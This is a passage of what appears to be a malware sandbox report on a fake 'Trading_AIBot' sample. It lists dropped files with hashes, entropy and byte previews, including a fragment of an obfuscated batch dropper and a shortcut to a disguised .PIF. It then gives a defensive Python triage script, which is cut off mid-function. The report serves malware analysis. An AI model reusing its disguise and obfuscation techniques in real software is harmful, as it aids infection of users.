                                                                                                                                                                                                                                                                                                                                                    SHA-512:ED1C2989794209B75DEBDEA553A7C6C44D01B4835A66FAA3EAFE953708B58A38FC5D97820AFEFFF79BB4EF8189276604A49A498F81EB279D9F99A84836D7C144
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@....................................]..... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1408512
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.441162970983243
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:YWKntIfGpIsqjnhMgeiCl7G0nehbGZpbD:T8IeODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:92DA7A4B191708715EFE6F6AEB138977
                                                                                                                                                                                                                                                                                                                                                    SHA1:F80B98C41B42C6E9D780A83FD9B54EFB2D2FE382
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E3A310B7E4B6DC8543195F421F0665C0C4196AD6780BD3CE86A5F3DE1CDBC8E3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:495579677FAA473E111FC838B1DB46D08F8C3AD33CEEB1F0DFFF77833C9F89627F570C26D20295C8A6E7F1ACF48C3BD1038D71E3B5CDC81F5FF00A0236ECACC6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.....................................W.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1185280
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.103288587510427
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:GIhaXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:basqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:764B49B666D98DBB1BDF2138462086BD
                                                                                                                                                                                                                                                                                                                                                    SHA1:FEEC3119EF955A1CE7AC02B579191B2512854943
                                                                                                                                                                                                                                                                                                                                                    SHA-256:A4EB46CA32F9267401AA0F229D5DC6B88E622519125B26CBC33AC18811A0EB29
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C80F24275E7E42951E8DB4036288457DC7197B771C3BD9E5B9D1BD1F41F497118FF02C08F644ADC65F25811DA273D58E9432D861B33187C01CFA998EFAFCCA70
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1531904
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.421207759462551
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:j8oREwt2ioQ3J+RHsqjnhMgeiCl7G0nehbGZpbD:j8oRpoFbDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:CDDA92F225D42E9ABCCD3D48913C2EAC
                                                                                                                                                                                                                                                                                                                                                    SHA1:CFA6EB6A913D56929A9A3B09E435347419AE0E7F
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F52335E576B1F774C9BC40043CBFC614C40B2776D3B7CDEFFD4D8A0B424B1382
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B97E159F4EA9EF54D5F58E7DCBF4EFD185A3B2653EBE0E2A8CF42C4E8F2AAD3B97AF4B65D57C316ADB9D8B95D0113DD266361F2EADDD2BD4A51674E96B195E9B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@....................................J..... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):104
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.195196088872012
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMsiBsOsbxOaK/y:HRYFVmTWDyzmBsOExOPq
                                                                                                                                                                                                                                                                                                                                                    MD5:D78C2108A0BBCF6F88464D42E31E5BDE
                                                                                                                                                                                                                                                                                                                                                    SHA1:40003F2B4A419B91DD469B9B699FF8D2AFEB0189
                                                                                                                                                                                                                                                                                                                                                    SHA-256:460C2E952B570A0A70E1A2C993CD42AFE8A9D6239AEAEF0CD17EB30F37B78462
                                                                                                                                                                                                                                                                                                                                                    SHA-512:2529FD05C59B561ABC61D5F7E2705A08000EB82BA6E817C7B1F9CEAB8F1016513FBC5038C063CF68E2990DA21A479A8EDFC67FAF5290DC597AD3F3BDB367AB5B
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Juqmtmya.PIF"..IconIndex=912420..HotKey=68..
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2386716
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.750563994554051
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:y4lGgAK/eHLG7HcOEPQW1LM9Cwyq7uP6yIFBlZ:ppAqyGTE1o9PPyOBlZ
                                                                                                                                                                                                                                                                                                                                                    MD5:5E9E591803218A9803C8F7B2C63DD663
                                                                                                                                                                                                                                                                                                                                                    SHA1:8711875A288EBD187AFFE45CD31EC8E55D05FDB1
                                                                                                                                                                                                                                                                                                                                                    SHA-256:BD53A567B8ED172FE46F5396276B2FA285CB9FCE1748411EB42960833CBC9A93
                                                                                                                                                                                                                                                                                                                                                    SHA-512:407B99B5AA46998EECCEED92484C0BDFE86EF56FA9AB1BAC83F13B3615EF1CCC898B0DEEC6A02F1659637B6723AE474781955E7A5EB8B28450210C734BE4503E
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:...Y#..K..... .$..!.!'&..&.......%..... ........ %.....Y#..KU"..!.&..&&...Y#..K^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyrsmmud\]smu_]qmns^xm_dy\^zyro_sctu`w`fev^eoyr.Rh-kca.e_p.f.law9wkv`.bvms.k\{{._g<Qp).9j8....l+.5a..Gw..5^..@.3\^T....7ct[.h.....yr...d..Y.7^r..4.v.\*
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1226752
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.458699684550258
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
                                                                                                                                                                                                                                                                                                                                                    MD5:53F0663219E6091CECD600C59389711F
                                                                                                                                                                                                                                                                                                                                                    SHA1:F1986A61C2CB0107444FBD3E8075A25E21FB26CA
                                                                                                                                                                                                                                                                                                                                                    SHA-256:0161D30DEFEE14B9BDAC49068C63A344320C11330ACDFC10952C025637684ADB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9D466680CC90F57ADA29495E32592084EC6DAF37CDC53F2776A720D66F0284B09C619A25C9EDE8E73E91B8C20D2A7AB5DFEE0504BA7454389CE842AFD27962A1
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................T.............@..........................P...................@...............................%...........................0...g........................... .......................................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...........z...................idata...%.......&...z..............@....tls....4................................rdata....... ......................@..@.reloc...g...0...h..................@..B.rsrc...............................@..@.............P......................@..@................................................................................................
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:G:G
                                                                                                                                                                                                                                                                                                                                                    MD5:235E3CE2A2E86591AA93D92D02D1F10A
                                                                                                                                                                                                                                                                                                                                                    SHA1:AE1639960DB3F5A29406D68578F4E7AB7F3CA39E
                                                                                                                                                                                                                                                                                                                                                    SHA-256:EC185E1B830B1DB532BB59FAE58E706DE8371497B7A26A48795E7B870DE6AB69
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D56AC6BAB05777633DAEEAE9CA032DD2A6A2F2EC399E649FB9A588374CCF1FB3CCE6700D05070A21396B7D1A387A4FD8790194E97A75A69D7705735FD828DA55
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:40..
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):62357
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                                                    MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                                                    SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                                                    SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):68096
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                                                    MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                    SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@

Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):236544
Entropy (8bit):6.4416694948877025
Encrypted:false
SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

Process:C:\Windows\SysWOW64\esentutl.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18944
Entropy (8bit):5.742964649637377
Encrypted:false
SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:B3624DD758CCECF93A1226CEF252CA12
SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):410
Entropy (8bit):5.361827289088002
Encrypted:false
SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:64A2247B3C640AB3571D192DF2079FCF
SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):2232
Entropy (8bit):5.379460230152629
Encrypted:false
SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:4DC84D28CF28EAE82806A5390E5721C8
SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
Malicious:false
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1425408
Entropy (8bit):5.680690579464684
Encrypted:false
SSDEEP:24576:Zk70Trcosu4CTPpR9+aHsqjnhMgeiCl7G0nehbGZpbD:ZkQTAW5v+ADmg27RnWGj
MD5:9ECE2AAE8E8FA77849268DDA20CAEC7B
SHA1:51A2DCBBA6BCBB069A3A5AB77659D46E98B02289
SHA-256:A7BA9EAC2A255CAB335D7B0D00DA00C962E2BECC8AEBF313434E861C502D5DD9
SHA-512:E3CB79FB953D247C98B06E64EFE737D53EB57233B43B4FD2A637EBD0F5C9FF088ADCAF4CFFC095AA6A6CE7B87F4B9812D1D8B76A0D27BBBBB4955FA57260ADB7
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.................................J...........................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:modified
Size (bytes):70656
Entropy (8bit):4.910353963160109
Encrypted:false
SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
MD5:E91A1DB64F5262A633465A0AAFF7A0B0
SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
Malicious:true
Reputation:unknown
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:unknown
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\Public\Libraries\aymtmquJ.pif
File Type:data
Category:dropped
Size (bytes):12320
Entropy (8bit):7.986248430480442
Encrypted:false
SSDEEP:384:oMY8gNsUCq5S66/dreB4TiOEIXyybayT0KZBnocpG:bY8gWxyS66/dro4TO0GeBnocpG
MD5:653A6A05C49487D7220447F1680FD655
SHA1:E560713DE45215EB3180F50C474AA4723AA27056
SHA-256:FEFFB945031332189C9B15E83D746D701A8AEDFC8C91DC07C08BC16A025C5EAB
SHA-512:DA144C60309DF4DCAF11D73EC41B0DE93132B4042575607E8F13DE02D19E32674C4DF3A6040B00001A2751909CEBCF6CD8607DA6FC15FB3DA5CB31E05BAC0AA1
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):665670656
Entropy (8bit):7.999999322396024
Encrypted:true
SSDEEP:
MD5:A89798786670C9BBB806311854859FF3
SHA1:EB70FB0007B6C59BCF5ED287AFCE580EC00EAF80
SHA-256:D3A0F32738261ADC57F76BE1605CE1BE9D5684BA039EA34398A48CA364E4D9C7
SHA-512:62C49C0888D52569EB6F7CE6F8E1A109168D8FCF36673988D13785EDE0E3F541CF0BE483B7B9240DDBE9F9F0B35B108AB34B471201E24D2FEDBDDE7A4120C326
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
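The entry above is the one behind the "Drops large PE files" signature: a 665,670,656-byte .NET PE32 with an 8-bit entropy of 7.99999, which the report marks as Encrypted:true and for which no SSDEEP was computed. A PE that large and that close to random is typically a small executable padded with high-entropy junk so that it exceeds the size limits of scanners and upload portals. The following script is an added example (not Joe Sandbox code) that reproduces the report's per-file measurements offline: the three hashes in the report's uppercase style, Shannon entropy in bits per byte, a walk of the PE headers to confirm the CLR directory that makes `file` call it a Mono/.Net assembly, and the size of the overlay after the last section, which is where padding usually lives. The bloat thresholds and the minimal PE builder used for the self-test are constructed for this illustration and are not the sandbox's rules.

```python
"""Offline triage of a dropped PE: hashes, 8-bit entropy, .NET flag, overlay size.

Added example; not Joe Sandbox code. Thresholds below are assumptions for the
illustration, not the sandbox's own rule for 'Encrypted' or 'large PE'.
"""
import hashlib
import math
import struct
from collections import Counter

BLOAT_ENTROPY = 7.9       # assumed: bytes are essentially random
BLOAT_BYTES = 100 << 20   # assumed: 100 MiB is already far beyond a normal loader


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 .. 8.0 (the report's 'Entropy (8bit)')."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())  # one pass


def hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA256 as uppercase hex, matching the report's presentation."""
    return {a: hashlib.new(a, data).hexdigest().upper() for a in ("md5", "sha1", "sha256")}


def is_bloated(size: int, entropy: float,
               size_threshold: int = BLOAT_BYTES, entropy_threshold: float = BLOAT_ENTROPY) -> bool:
    """Large file whose bytes are near-random: padded/encrypted payload rather than code."""
    return size >= size_threshold and entropy >= entropy_threshold


def pe_summary(data: bytes) -> dict:
    """Parse DOS, COFF and optional headers plus the section table; measure the overlay."""
    if data[:2] != b"MZ":
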